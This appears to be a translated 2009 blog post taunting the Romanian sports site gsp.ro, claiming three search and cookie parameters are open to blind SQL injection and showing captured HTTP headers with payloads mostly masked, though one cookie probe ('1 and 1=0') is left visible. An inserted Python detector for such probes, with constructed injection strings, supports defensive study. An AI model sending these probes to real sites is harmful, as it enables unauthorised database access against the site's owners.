If last week the boundless imagination of the GSP folks treated us to a simulated hack, the boys are now taking their imagination even further and offering us some other spicy details:
Let's suppose we have 3 parameters: section, search[text] and curent_c3, all 3 in the search section of the gsp.ro site…
Can you guess what the 3 musketeers are vulnerable to? You guessed it… blind SQL injection… We're not giving details, because we don't have a reason to yet.. and besides… what would Romanian sport do without gsp?
Still, since we like spicy things, let's look at the request and the response headers in the 3 cases:
Parameter: section (GET)
Request header:
GET http://www.gsp.ro/?section=cautare'+*****+'********&limba=rom&search[text]=********* HTTP/1.1
Host: www.gsp.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: POPUPCHECK=1242387861723;PHPSESSID=8376e9f5e950cab16a992de62207a5e1;cresist=592FF71F00000050;curent_c2=2;curent=1;curent_c3=1
The response:
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Vary: User-Agent, Accept, Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Content-Type: text/html
Date: Tue, 19 May 2009 09:48:31 GMT
Server: DigitalIT HTTPD 2.02
Via: CN-5000
Connection: Keep-Alive
Parameter: search[text] (GET)
Request header:
GET http://www.gsp.ro/?section=cautare&limba=rom&********=*****'****'******* HTTP/1.1
Host: www.gsp.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: POPUPCHECK=1242387861723;PHPSESSID=8376e9f5e950cab16a992de62207a5e1;cresist=592FF71F00000050;curent_c2=2;curent=1;curent_c3=1
Response header:
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Vary: User-Agent, Accept, Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Content-Type: text/html
Date: Tue, 19 May 2009 09:49:09 GMT
Server: DigitalIT HTTPD 2.02
Via: CN-5000
Connection: Keep-Alive
Last parameter: curent_c3 (cookie)
Request header:
GET http://www.gsp.ro/?section=********=********* HTTP/1.1
Host: www.gsp.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: POPUPCHECK=1242387861723;PHPSESSID=8376e9f5e950cab16a992de62207a5e1;cresist=592FF71F00000050;curent_c2=2;curent=1;curent_c3=1+and+1%3D0
Response header:
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Vary: User-Agent, Accept, Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Content-Type: text/html
Date: Tue, 19 May 2009 09:51:17 GMT
Server: DigitalIT HTTPD 2.02
Via: CN-5000
Connection: Keep-Alive
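A defender-side check for the three cases above, written as an added example that is not from the original post or from gsp.ro: it URL-decodes GET parameters and cookie values and flags boolean-probe patterns like the one carried in the curent_c3 cookie. The log record shape (request line plus Cookie header), the cookie values and all probe strings are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Heuristic for boolean-based blind SQLi probes: a tautology such as "1 and 1=0", a
# string-breaking quote followed by a SQL keyword, or a comment / stacked-query terminator.
PROBE = re.compile(r"""(?ix)
    \b(?:and|or)\b\s*['"]?\s*\w+['"]?\s*=\s*['"]?\s*\w+   # 1 and 1=0, or 'a'='a
  | ['"]\s*(?:and|or|union|select|sleep|benchmark)\b     # cautare' and ...
  | --\s | /\* | ;\s*(?:drop|select|update|delete)\b     # comment / stacked query
""")

def is_probe(decoded_value: str) -> bool:
    """True when an already URL-decoded value looks like a SQL injection probe."""
    return PROBE.search(decoded_value) is not None

def parse_cookie(header: str) -> dict:
    """Split a raw Cookie header ('a=1;b=2') into name -> raw value."""
    pairs = (p.strip().partition("=") for p in header.split(";") if p.strip())
    return {name: value for name, _, value in pairs}

def scan_request(request_line: str, cookie_header: str = "") -> list:
    """Return (where, name, decoded_value) for every suspicious query or cookie value."""
    target = request_line.split()[1]                      # "GET <url> HTTP/1.1"
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if is_probe(value):                               # parse_qsl already decodes
            hits.append(("query", name, value))
    for name, raw in parse_cookie(cookie_header).items():
        value = unquote_plus(raw)                         # the post's cookie used + and %3D
        if is_probe(value):
            hits.append(("cookie", name, value))
    return hits

# Constructed sample records mirroring the three cases above (all values are made up).
SAMPLES = [
    ("GET http://www.gsp.ro/?section=cautare'+and+1%3D1--+&limba=rom HTTP/1.1",
     "PHPSESSID=deadbeef;curent_c2=2;curent=1;curent_c3=1"),
    ("GET http://www.gsp.ro/?section=cautare&limba=rom&search[text]=test'+or+'a'%3D'a HTTP/1.1",
     "PHPSESSID=deadbeef;curent_c2=2;curent=1;curent_c3=1"),
    ("GET http://www.gsp.ro/?section=cautare&limba=rom HTTP/1.1",
     "PHPSESSID=deadbeef;curent_c2=2;curent=1;curent_c3=1+and+1%3D0"),
    ("GET http://www.gsp.ro/?section=cautare&limba=rom&search[text]=Steaua+and+Dinamo HTTP/1.1",
     "PHPSESSID=deadbeef;curent_c2=2;curent=1;curent_c3=1"),
]

if __name__ == "__main__":
    for line, cookie in SAMPLES:
        print(scan_request(line, cookie) or "clean")
```

The regex is tuned for recall, so treat hits as triage input and keep the decoded value with the alert; the fourth sample shows an ordinary search with the word "and" staying clean.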
Now… after such a conversation with the gsp server, I have only one wish left:
…in the quiet of the evening… to ask the boys at gsp.ro whether they have any other qualification besides the admin one… they might need it one day…
For now, for obvious reasons, we're not doing full disclosure, but you never know… :)